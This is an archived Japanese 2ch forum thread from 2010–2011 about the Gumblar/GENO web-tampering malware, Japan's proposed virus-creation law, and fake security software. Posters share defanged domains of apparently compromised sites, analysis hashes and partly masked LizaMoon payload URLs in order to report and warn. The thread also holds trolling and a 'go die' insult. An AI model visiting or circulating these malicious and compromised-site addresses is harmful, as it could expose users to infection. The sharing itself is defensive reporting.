454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?

686:名無しさん@お腹いっぱい。
11/01/05 01:35:43 BE:3159129896-PLT(21389)
擁護認定の流れが始まるのか
胸薄

687:('д') ◆yUyb3Tqn92
11/01/06 11:22:14
('д')お前ら煽りに耐性ねーのな
自分で言うのもなんだけどコテにも耐性ねーだろお前ら
俺様の狙い通りの反応なんだもーん♪('д'三'д')だもーん♪
気持ち悪いPCおたくでしかもおっさんなお前らだからしゃーないか(>w<)プクススススwww

688:('д') ◆yUyb3Tqn92
11/01/06 11:23:14
>>688
(>w<)8が二つで!ラッキーん☆

689:('д') ◆yUyb3Tqn92
11/01/06 11:30:06
88をゲットしたので久々にこの顔登場

      ∞
   8'д'8 !?

690:名無しさん@お腹いっぱい。
11/01/06 20:52:24
NHK教育 23:30
ITホワイトボックス2選 脅威ガンブラーウイルスの正体▽感染拡大の謎▽対策は?

691:名無しさん@お腹いっぱい。
11/01/08 15:54:22
株式会社GENO - ECサイト運営スタッフ募集
URLリンク(www.find-job.net)


692:あぼーん
あぼーん
あぼーん

693:名無しさん@お腹いっぱい。
11/01/12 14:11:10
やめろや

694:あぼーん
あぼーん
あぼーん

695:/名無しさん[1-30] ◆.htmlint.U
11/01/13 14:59:34
ダンさん落ちてる。。。orz....

696:名無しさん@お腹いっぱい。
11/01/20 19:53:56
2chハックの件以降、キチガイを見ないな…

697:名無しさん@お腹いっぱい。
11/01/22 12:21:49
Gumblarももう終わりか、つまんないな

698:/名無しさん[1-30] ◆.htmlint.U
11/01/23 06:28:39
あるっぽい。
Received 2011-01-19 11:54:20
JSUNPACK
8fa8604f9abcf13ca0abe8775cdad54cad50d4a1


VIRUSTOTAL順番待ち7000番台ってどーよ。。。

699:名無しさん@お腹いっぱい。
11/01/24 13:26:14
てす

700:名無しさん@お腹いっぱい。
11/01/24 14:02:35
>>698
malware作者が妨害のためにゴミ投げまくったんでしょ

701:神
11/01/25 14:52:53
ウイルスサイトのURL貼ってくんない?
まぢウイルスかかってみたいんだけどさぁ www

702:名無しさん@お腹いっぱい。
11/01/25 15:30:56
>>701
URLリンク(www.mhlw.go.jp)

703:名無しさん@お腹いっぱい。
11/01/25 16:03:05
643 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 04:49:34 ID:ATQNV0HP0 [1/5]
1・24学習会 私たちの言論・表現活動の自由が危ない!
すべてのインターネット通信が監視される?
「コンピュータ監視法」とは何か
なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか
 法務省は、今通常国会にウィルス作成罪をふくむコンピュータ監視法を提出しようとしています。
 共謀罪は法律に違反することを実際に行わなくとも、話しあうだけで処罰するものですが、
コンピュータ監視法の中のウィルス作成罪は、同じようにそれが使用もされていない、ウィルスかどうかもわからないプログラム作成の段階で処罰しようとするものです。
そのためには、インターネットによる私たちの通信のすべてが監視されることになるでしょう。
共謀罪とコンピュータ監視法は、いずれも言論・表現行為の段階で、市民に対する監視を強め、規制しようという狙いで一致しています。
コンピュータ監視法には、捜査当局が裁判所の令状もとらずに、プロバイダーなどにパソコン、
携帯電話のメールやホームページへのアクセスなどの通信履歴を90日間保全要請できるという規定もあります。
 コンピュータは現在市民にとって必要不可欠な通信手段となっています。
この法案ができれば、通信の秘密が侵害され、市民の自由な言論・表現
 活動が規制されて、民主主義を危うくするでしょう。
 学習会で詳しく学び、コンピュータ監視法の国会提出に反対しましょう。お誘いあわせてご参加ください。
■と き 1月24日(月)午後6時30分~
■ところ かながわ県民センター709号室
(横浜駅西口から徒歩5分、ヨドバシ・カメラ裏)
地図 URLリンク(www.pref.kanagawa.jp)
■お話し 山下 幸夫さん(弁護士)
「なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか」
■参加費 500円
■主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
ネットワーク反監視プロジェクト Tel.070-5553-549 5

704:名無しさん@お腹いっぱい。
11/01/25 16:03:45
644 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 04:49:58 ID:ATQNV0HP0 [2/5]
110124コンピュータ監視法学習会
iwakamiyasumi on USTREAM: フリージャーナリスト・岩上安身が、どこにでも出かけて、誰にでも取材し、可能な限り、ダイレクトに情報をお伝えします。インタビュー、対談、記者会見、などなど。. ...
URLリンク(www.ustream.tv)
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
URLリンク(portside-station.net)
Togetter - 「コンピュータ監視法学習会tudaりまとめ」
URLリンク(togetter.com)
神奈川県横浜市神奈川区鶴屋町2-24-2 - Google マップ - かながわ県民センター
URLリンク(maps.google.com)

第171回国会 議案の一覧
URLリンク(www.shugiin.go.jp)
法務省:第163回国会(特別会)提出主要法律案
URLリンク(www.moj.go.jp)
法務省を対ウイルス法案で突っついてみました
URLリンク(angels-pathway.clanteam.com)

サイバー犯罪条約
URLリンク(www.mofa.go.jp)


705:名無しさん@お腹いっぱい。
11/01/25 16:04:31
|1・25コンピュター監視法学習会のご案内
|カテゴリ : 監視社会
執筆 : toshi 2010-1-6 3:32

 以下のような学習会を開きます。東京都がネットカフェ規制の強化を条例化しようとするなど自治体レベルでのネット監視がじわじわと進んでいる。
コンピュータ監視法案は共謀罪とともに繰り返し廃案になっているが、共謀罪ほど反対運動の焦点にはなってこなかった。
しかし、民主党政権はとりあえず共謀罪については、法案の提出の動きは見えないが、
コンピュータ監視法案は共謀罪から切り離しての提案もありえないわけではない。油断は禁物というのが現状だということを知ってほしい。

1・25コンピュター監視法学習会のご案内

コンピュータの規制が犯罪対策を理由に年々強化されてきています。こうした
動きを一挙に加速させると考えられているのが、サイバー犯罪条約批准のため
の国内関連法の整備を理由としてだされたコンピュータ監視法です。
コンピュータ監視法の性格は、共謀罪新設法案とともに一体のものとして「刑
法等の一部改正案」としてだされたところに鋭く示されています。
いまやコンピュータは市民の日常生活にとってなくてはならない通信手段です。
サイバー犯罪対策の名の下にコンピュータへの監視・規制を強めようとするコ
ンピュータ監視法の制定を許してはなりません。
同法は、現在共謀罪新設法案とともに廃案となりましたが、法務省などの同法
推進派が条約の批准を理由にいつ上程してくるかはわかりません。
サイバー犯罪条約とは何か、コンピュータ監視法とは何か、学習会を開きます。
ぜひ、ご参加ください。


706:名無しさん@お腹いっぱい。
11/01/25 16:05:17
652 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 05:34:58 ID:ATQNV0HP0 [4/5]
>>645
と き  1月25日(月)18時40分~21時
ところ  ピープルズ・プラン研究所会議室
(東京都文京区関口1-44-3 信生堂ビル2F
Tel:03-6424-574 8 地下鉄有楽町線江戸川橋駅1B出口徒歩5分)
     URLリンク(maps.google.co.jp)
お話し 山下幸夫さん(弁護士)
    「サイバー犯罪条約とコンピュータ監視法」
    小倉利丸さん(富山大学教員)
    「コンピュータ監視法の問題点」
参加費 500円
主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
    ネットワーク反監視プロジェクト Tel.070-5553-549 5
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
コメント (0)トラックバック (0)閲覧 (405)

no more capitalism - 1・25コンピュター監視法学習会のご案内
URLリンク(alt-movements.org)
東京都文京区関口1-44-3 - Google マップ - 信生堂ビル2F
URLリンク(maps.google.com)

707:名無しさん@お腹いっぱい。
11/01/25 16:07:06
653 名前:名無したちの午後[sage] 投稿日:2011/01/25(火) 05:37:53 ID:ATQNV0HP0 [5/5]
日曜日, 1月 23rd, 2011 | Posted by KIMURA
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月)

URLリンク(www.ustream.tv)

 ジャーナリスト岩上安身さんのスタッフが生中継を行いました。
 流れとしては、
「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」(通称コンピューター監視法)が提出され、
可決を契機に、現在日本は批准していない国際的なテロ防止と称して情報通信を監視する「サイバー犯罪条約」に批准することが考えられ、
さらに批准を契機に盗聴法改正まで行われるのではないかという見解がある。
広く考えると、憲法によって守られている通信の秘密や表現の自由までも国家権力が脅かしうるという、危険な状況で、
さらにこの法改正を理由に憲法の解釈を変えたり、場合によっては憲法改正までもが行われるのではないか、とも言われている。
 日弁連を中心にこの「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」を廃案にするための動きが起きている。
 もしもこの法改正が進めば、インターネットや携帯電話による市民の情報通信は常に監視されることになるだろう。
警察による通信履歴の検閲や、コンピューター上でのプログラミングすらも、ウィルス作成罪にあたるとして取り締まることが可能になる。
 盗聴法<組対法>に反対する市民連絡会では、プライバシーを侵害し、表現の自由を規制する盗聴法の廃止を求める市民団体共同声明に賛同を募っている。 URLリンク(www.anti-tochoho.org)


708:名無しさん@お腹いっぱい。
11/01/25 16:09:52
 資料としてこちらのHPを一緒にご覧ください。

 コンピュータ監視法に対する疑問(盗聴法<組対法>に反対する市民連絡会 )
 URLリンク(www.anti-tochoho.org)
 サイバー犯罪条約 URLリンク(www.mofa.go.jp)
 日弁連が提出したサイバー犯罪条約への意見書 URLリンク(www.nichibenren.or.jp)


【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
URLリンク(portside-station.net)


709:名無しさん@お腹いっぱい。
11/01/25 16:29:41
総務省のインフルエンザのページ貼ったらファビョってしまったようだ
すまない

710:名無しさん@お腹いっぱい。
11/01/28 16:12:22
これなんだ?

analyzer5.fc2.com:8080/ana/processor.php?uid=107662

analyzer5.fc2.com:8080/ana/analyzer.php?uid=107662&pid=0&idsess=&ref=&href=http%3A//zbrjinsoul4.web.fc2.com/&wid=1024&hei=1024&col=24&visitor=1-1642776976-1296198419-0-1-1-0

711:名無しさん@お腹いっぱい。
11/01/28 17:04:37
FC2のアクセス解析だろ

712:名無しさん@お腹いっぱい。
11/01/28 18:13:57
fc2のアナライザーはadblockなんかでブロックしても特に問題ない

713:名無しさん@お腹いっぱい。
11/01/28 19:45:40
>>710
お前さんがFC2アクセス解析が入っているページ(主にFC2ブログ)にリンクを貼った

そのサイト主がFC2アクセス解析を見てリンクを辿った

それがお前さんのサイトのアクセス解析に残った

そんだけ
鑑定は他でやれ

714:素人
11/01/31 16:50:34
ブラウザを見ただけでボットに感染することってありますか?


715:名無しさん@お腹いっぱい。
11/01/31 16:52:41
>>714
感染した感じがしたら、もう掛かってますw

716:名無しさん@お腹いっぱい。
11/01/31 17:55:26
>>714
どこからここにたどり着いちゃったの?
素人をアピールすることに何の意味があるの?
ブラウザを見るってのは実行ファイルを見るってこと?
ファイル見ただけじゃ感染しようがないでしょ

717:名無しさん@お腹いっぱい。
11/02/05 00:27:38
オミトロンに登録した古いGenoウイルス警告スクリプトがこのサイトに反応した
www●no-review●net/
Javaスク切った状態でアクセスしてるから異常は無いと思うんでウイルスチェックはしてない。
みんなはどう?

718:名無しさん@お腹いっぱい。
11/02/05 12:07:10
>>716

719:名無しさん@お腹いっぱい。
11/02/05 12:12:02
最近活気無いなあ
そろそろいいの?

720:名無しさん@お腹いっぱい。
11/02/05 15:07:10
>>717
いろいろアレだけど
JavaScriptオフで防げないのもあるから注意してね

721:名無しさん@お腹いっぱい。
11/02/05 18:00:54
【AV女優】晶エリー(大沢佑香)の公式サイトがGENOウイルスに感染中!
スレリンク(news板)

722:名無しさん@お腹いっぱい。
11/02/05 19:49:42
>>721
ソース見たけど1行目からロシア行こうとしててすごくおろロシア
末尾にもあるね

723:/名無しさん[1-30] ◆.htmlint.U
11/02/05 20:37:36
>>721
whoisでぬるぽ完了。

724:名無しさん@お腹いっぱい。
11/02/05 22:17:38
>>721-723
消滅じゃなくて戦略的撤退だったのね・・

改竄祭絶賛開催中
isawa-crystal●com/
ソース見てワラタ

725:名無しさん@お腹いっぱい。
11/02/05 22:27:05
>>724
ひどすぎて吹いた
danさん経由なのにAviraが怒り出すしひどい

726:/名無しさん[1-30] ◆.htmlint.U
11/02/06 00:55:38
>>724

whoisからメルかんりょ

727:名無しさん@お腹いっぱい。
11/02/09 20:00:55
>>726

どっとこむ8080装填中
club-garcons●com/


728:/名無しさん[1-30] ◆.htmlint.U
11/02/09 20:13:00
>>727
banana3306●maido3●com
う~む。。。

729:/名無しさん[1-30] ◆.htmlint.U
11/02/09 21:19:50
>>727
いちおメルすた。
連絡先がドコダなので蹴られている可能性大。。。

730:名無しさん@お腹いっぱい。
11/02/09 21:47:05
スレリンク(sec2chd板:366番)

731:名無しさん@お腹いっぱい。
11/02/25 21:01:47.73
システム復元で偽セキュリティを駆除できると思ってる大馬鹿者が急増してるなw


732:/名無しさん[1-30] ◆.htmlint.U
11/02/27 07:12:12.15
VTがおかひいお。。。

733:/名無しさん[1-30] ◆.htmlint.U
11/03/04 15:22:19.35
(・肉・) トレトレピチピチカニリョーリ♪

JSUNPACK
6e2cf8ebd8635107d4e26b2861c3a26cf4073e14

734:名無しさん@お腹いっぱい。
11/03/07 19:28:14.33
みん(なあたま)カラ(っぽ)とは良く言ったもんだwww
URLリンク(minkara.carview.co.jp)
URLリンク(minkara.carview.co.jp)

【セキュリティの強化】って、具体的に何をすれば良いのかブログ書いてくれよw


735:/名無しさん[1-30] ◆.htmlint.U
11/03/07 22:01:29.92
>>734
こりか。。。

壁紙を変更する偽セキュリティソフト、国内で感染報告が増える
URLリンク(internet.watch.impress.co.jp)
URLリンク(jp.trendmicro.com)

736:名無しさん@お腹いっぱい。
11/03/08 00:50:39.79
>>734
自分で燃料投下して逆ギレとか、どんだけバカなんだよwwww

737:!ninja
11/03/08 01:05:54.25
!ninja

738:名無しさん@お腹いっぱい。
11/03/08 19:52:44.78
>>734
>たぶん、セキュリティがちょっと低く設定されていたか
>JAVAが最新でなかったのが原因で入り込まれたとか考えられるそうです。
>ウイルスバスターも強制終了ww
>エ○サイトのURLはLunascapeに登録していたので消えましたがww

ユーザーのセキュリティー意識が低ければ
糞の役にも立たないウイルスバスターにワロタ


739:名無しさん@お腹いっぱい。
11/03/09 00:39:18.08
>>738
それはなんでも同じじゃね
ユーザーが全て許可をしてしまえばおしまい

740:名無しさん@お腹いっぱい。
11/03/09 10:52:52.72
無知は怖いよ。

アメーバピグのFlashのバージョンアップで運営ブログが炎上したのだって
未だに平気でVer9を使っている連中が原因だぞ。

741:名無しさん@お腹いっぱい。
11/03/09 13:38:09.41
>>739
ウイルスバスターは、低次元な広告を見てもアホユーザーがメイン対象にもかかわらず
そのアホユーザーには効果がないなら、存在が無意味だろうし
アホユーザー前提に設計したほうがいいと思うのよね。

許可するシーンで
例のヤクザ坊主が出てきて、しつこく何度も脅すとか
例の女が発狂しているシーンが出てきて、JAVAのアップデートを促すとかw

742:名無しさん@お腹いっぱい。
11/03/09 13:56:52.09
ドライブバイダウンロードを喰らうバカに多いパターン

1:「○○(セキュリティソフト)を入れてるから大丈夫」と豪語している

2:全てをセキュリティソフトに依存しているため、
地雷(DBD)を踏むと高確率で感染する

3:「○○入れてたのに感染した(怒)」と、セキュリティソフトに文句を言う

4:必死になって駆除方法を捜して駆除は行うが、
感染原因を知ろうとしない為、根本的な対策ができない(駆除方法と一緒に書いてあっても一切見ない)

5:2に戻る


セキュリティソフト依存症は病気(精神疾患)ですよw

743:名無しさん@お腹いっぱい。
11/03/09 17:41:16.81
依存してるんじゃなくて何も知らないだけってのもある
セキュリティソフトも偶然入ってるだけで場合によっては期限切れ

>>741
たしかにそうだね
たとえ誤爆してでも初心者ユーザーには選択肢を与えないほうがきっと安全
バスターが把握していないものは許可しないとかそういうモードをつけてもいいかもしれない
どうせ初心者なら使うソフトも限られてるだろうし

744:名無しさん@お腹いっぱい。
11/03/11 11:02:19.25
「ウイルス作成罪」新設、提供・取得・保管も 改正案閣議決定
スレリンク(newsplus板)

これからは故意でなくても脆弱性を修正しないで放置して
Gumblarようなウィルスの踏み台にされた時点で逮捕されるわけだな。

745:名無しさん@お腹いっぱい。
11/03/11 14:20:44.45
>>744
>作成罪に加え、提供、取得、保管などの罪を新設。

マルウェアの取得が違法

ベンダーに検体が提出されない

極地的に流行るマルウェアに対応できず、感染PCが急増

感染したPCを所有する者は容赦無く逮捕

罰金(30万円以下)と、証拠品として押収したPC(クリーニングされた後、中古品として販売)でガッツリ稼ぐ


さすが欠管政権w
穴だらけなのに隙が無いなwwww

746:名無しさん@お腹いっぱい。
11/03/11 14:36:33.59
記事には書いてないけど、提供・取得・保管が罪になるには前提条件があって
他人のPCを感染させる目的の場合らしいよ

747:名無しさん@お腹いっぱい。
11/03/12 20:03:44.23
>>745
辞民党は何もしてこなかったけどなwwww

748:名無しさん@お腹いっぱい。
11/03/12 21:00:22.21
>>747
法案自体は,2004年2月の第159回国会で閣法(内閣提出法案)として国会に提出されました。
とあるので、何もしてこなかった訳ではないらしい

ウイルス作成罪はいつになったら成立するのか
URLリンク(itpro.nikkeibp.co.jp)

749:名無しさん@お腹いっぱい。
11/03/12 21:50:09.09
ウイルス作成罪新設 刑法改正案、サイバーテロに厳罰 2011/3/11 8:43
URLリンク(www.nikkei.com)

> ウイルスの取得や保管も罪になり、2年以下の懲役または30万円以下の罰金。
> 対策ソフトの開発などが処罰対象とならないよう、
> 処罰の要件に「正当な理由なく」との表現を盛り込んだ。

> ウイルス作成罪創設の改正案提出は自公政権当時から3回目。

750:名無しさん@お腹いっぱい。
11/03/13 09:41:52.46
お、停電復帰したようですね貴方

751:/名無しさん[1-30] ◆.htmlint.U
11/03/22 12:00:31.99
Flash Playe 10.2.153.1
URLリンク(www.adobe.com)

752:名無しさん@お腹いっぱい。
11/03/25 16:02:11.01
>>721-722
すまない、いったいどんなソースコードがあったんだ?

753:名無しさん@お腹いっぱい。
11/03/25 22:14:50.02
>>752
だいたいいつものやつだよ

754:名無しさん@お腹いっぱい。
11/03/30 23:33:49.13
('д')の俺様ブログ -顔文字の俺様ブログ-
URLリンク(ruhuraro.blog57.fc2.com)
>このページの表示は許可されていません
>このブログは下記の理由などにより凍結されています。
>* 規約上の違反があった
>* 多数のユーザーに迷惑をかける行為を行った。

震災の記事の件で通報したら消滅すたw

755:名無しさん@お腹いっぱい。
11/03/31 00:24:26.39
>>754
URLリンク(megalodon.jp)
これか?

756:名無しさん@お腹いっぱい。
11/03/31 00:44:25.75
>>755
こりゃ凍結されても仕方ないわw

757:名無しさん@お腹いっぱい。
11/03/31 08:30:55.71
>>755
閲覧を観覧と書いちゃう男の人って…

758:名無しさん@お腹いっぱい。
11/04/03 01:24:43.57
>>754-755
URLリンク(ameblo)●jp/ruhuraro/entry-10847321466●html
>('Д')┌ んなことよりfc2でやってる俺様ブログがなぜか凍結されたぜ
>l('Д')l一体、この俺様が何をしたというのかあぁぁぁぁああああ!!!!
>('д' )震災をネタにしすぎたかしらん♪ちょっぴ反省w

反省しなくて良いからさっさと氏ねよ

759:名無しさん@お腹いっぱい。
11/04/03 01:40:21.62
URLリンク(www.google.com)

760:名無しさん@お腹いっぱい。
11/04/05 00:12:59.51
「ウイルス作成罪」盛り込んだ刑法改正案、国会に提出
スレリンク(news板)

761:名無しさん@お腹いっぱい。
11/04/05 19:55:11.97
新型SQLインジェクション攻撃「LizaMoon」多発~日本でも改ざん例を確認
URLリンク(www.so-net.ne.jp)

762:名無しさん@お腹いっぱい。
11/04/05 23:15:33.13
URLリンク(www.google.co.jp)

763:名無しさん@お腹いっぱい。
11/04/06 14:23:29.81
Wo[BLOCKED]ks.com/ur.php
al[BLOCKED]ne.com/ur.php
al[BLOCKED]er.com/ur.php
li[BLOCKED]on.com/ur.php
t6[BLOCKED]56.info/ur.php


764: 忍法帖【Lv=9,xxxP】
11/04/06 17:10:00.47
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
スレリンク(sec板)

765:/名無しさん[1-30] ◆.htmlint.U
11/04/16 07:50:25.13
>>751
10.2.159.1

766: 【東電 83.6 %】 忍法帖【Lv=32,xxxPT】
11/04/29 17:33:56.22
!denki!ninja

767:名無しさん@お腹いっぱい。
11/04/30 20:12:14.26
ほんまにわらかしてくれる
無菌状態にしようとするからいたちごっこになる
ゾンビの体でなにが来ても復活できるようにすれば問題なくなる。
仮想環境はもっと使いやすく作れるだろに
セキュリティ産業をすぐにすたれさすのはもったいないと言って
作らない。


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch